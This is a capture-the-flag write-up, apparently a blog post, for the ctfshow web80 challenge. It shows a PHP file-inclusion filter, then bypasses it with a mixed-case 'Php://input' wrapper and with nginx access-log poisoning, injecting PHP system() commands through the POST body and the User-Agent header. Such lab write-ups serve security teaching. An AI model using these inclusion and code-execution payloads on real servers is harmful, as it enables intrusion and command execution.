[ctfshow web入门] web80

一口一个橘子2025-05-31 16:46

信息收集

过滤了phpdata

php 复制代码 
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

解题

大小写绕过

data不知道为什么不成功,有知道的大佬也可以在评论区教我一手

s 复制代码 
?file=Php://input
post:
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

hackbar记得使用raw模式,basic模式下服务器无法收到任何post数据

日志绕过

php 复制代码 
?file=/var/log/nginx/access.log

user-agent里写上

php 复制代码 
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

web79    目录    web81

相关推荐
阿华的代码王国16 分钟前
【Android】日期选择器
android·xml·java·前端·后端
张拭心1 小时前
拭心 7 月日复盘|个体在 AI 时代的挑战
前端
芯盾时代1 小时前
芯盾时代受邀出席安全可信数据要素交易流通利用研讨会
安全·网络安全·数据安全·芯盾时代
这是个栗子1 小时前
express-jwt报错:Error: algorithms should be set
前端·npm·node.js
Dolphin_海豚1 小时前
vapor 的 IR 是如何被 generate 到 render 函数的
前端·vue.js·vapor
小妖6661 小时前
Next.js 怎么使用 Chakra UI
前端·javascript·ui
胡西风_foxww1 小时前
从数据丢失到动画流畅:React状态同步与远程数据加载全解析
前端·javascript·react.js·同步·异步·数据·状态
阿华的代码王国2 小时前
【Android】RecyclerView实现新闻列表布局(1)适配器使用相关问题
android·xml·java·前端·后端
汪子熙3 小时前
Angular 最新的 Signals 特性详解
前端·javascript
Spider_Man3 小时前
前端路由双雄传:Hash vs. History
前端·javascript·html
热门推荐
01Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code02全球最强模型Grok4,国内已可免费使用!(附教程)03VMware Workstation Pro虚拟机的下载和安装图文保姆级教程(附下载链接)04MSPM0G3507——读取引脚的高低电平方法(数字信号循迹模块)05KGG转MP3工具|非KGM文件|解密音频06UV安装并设置国内源07腾讯还是太全面了,限时免费!超全CodeBuddy IDE保姆级教程!(附案例)082025电赛e题:openmv识别过程丢失矩形09Coze 开源了,送上保姆级私有化部署方案【建议收藏】10扣子开源本地部署教程 丨Coze智能体小白喂饭级指南